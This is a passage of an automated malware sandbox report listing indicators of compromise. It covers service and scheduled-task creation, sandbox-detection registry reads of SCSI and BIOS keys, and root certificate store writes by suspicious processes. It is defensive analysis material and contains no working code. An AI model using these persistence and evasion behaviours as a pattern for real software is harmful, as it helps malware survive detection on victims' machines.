pid Process 2248 sc.exe 1468 sc.exe 548 sc.exe 2236 sc.exe 2180 sc.exe 2140 sc.exe 3004 sc.exe 608 sc.exe 2232 sc.exe 1920 sc.exe 3032 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 300 2012 WerFault.exe 47 2148 1992 WerFault.exe 63 984 768 WerFault.exe 134 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3sO43CV.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3sO43CV.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3sO43CV.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1772 schtasks.exe 2856 schtasks.exe 2320 schtasks.exe 2076 schtasks.exe 1292 schtasks.exe 1196 schtasks.exe 840 schtasks.exe 2040 schtasks.exe 2228 schtasks.exe 928 schtasks.exe 788 schtasks.exe 1604 schtasks.exe 568 schtasks.exe 1860 schtasks.exe 912 schtasks.exe 2748 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d79072038c960342ab421b8facb933e9000000000200000000001066000000010000200000006b031befe4df06b86704a436c90c73842eb8517552d508f916313bf4ddcac439000000000e8000000002000020000000b6ad9e6181485b4472ad6af7ddb3b069f18c6a82e3ede0ff3480cd03af0fc22f20000000b3f115e2cbe8370970e0b4d683a845f0e4eb030de0e6faf880013d720a091beb40000000fd69a6749a2c2c5edcb6602e12cddfae3dee0e04ab7ab83acc2376930a33b0629b1c4de000fa14dcc396bb618c12aebbdcc3bddc5ddbe00f77c56af32d2a9d58 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d79072038c960342ab421b8facb933e9000000000200000000001066000000010000200000007f72c903a29d19cf3ca3739128c92a4898148ae2d712221dc1567d72e6bd5da8000000000e8000000002000020000000b01af758366f14a5dc400268bd9ea7294d9bbcb8185309eedb17311f200465d6900000009ec04fa5d91f64fd8b65e5aa27766ddae34e4b87e135128a3f99581368ce165e30b7e9fcf9a7cf508622b059eb50b9e0ab76addd2951968ce4b53b2b08fdd24487ed87ca74bc9732cf94dcd186adb2aab4c4a94dee1cdd1706290590314ad6d032d6b5d27fb3821859c25457d1ff392af3d98f155264b7419f07c8c470757cd9e724d8410a329d4ff74e7e302dba460d40000000fd0d74ff0acbcbe3a7a229cc774bad9ce04f25e5bf3aa3b7bfc2ebf5d836120297dd5ec7b3706ed15f22d7a06c166e07acc3fe60b4a36c5a345ca73b8f027641 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d06b274cff06da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{83150121-72F2-11EE-AE52-CA07A0C133E5} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "404371524" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-5f-6d-7b-5a-38\WpadDecision = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" windefender.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 EixwDOh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs EixwDOh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" EixwDOh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs EixwDOh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs EixwDOh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-5f-6d-7b-5a-38\WpadDecision = "0" EixwDOh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-572 = "China Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs EixwDOh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root EixwDOh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs EixwDOh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-5f-6d-7b-5a-38 EixwDOh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" windefender.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-5f-6d-7b-5a-38\WpadDecisionTime = 10f2cda7ff06da01 rundll32.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 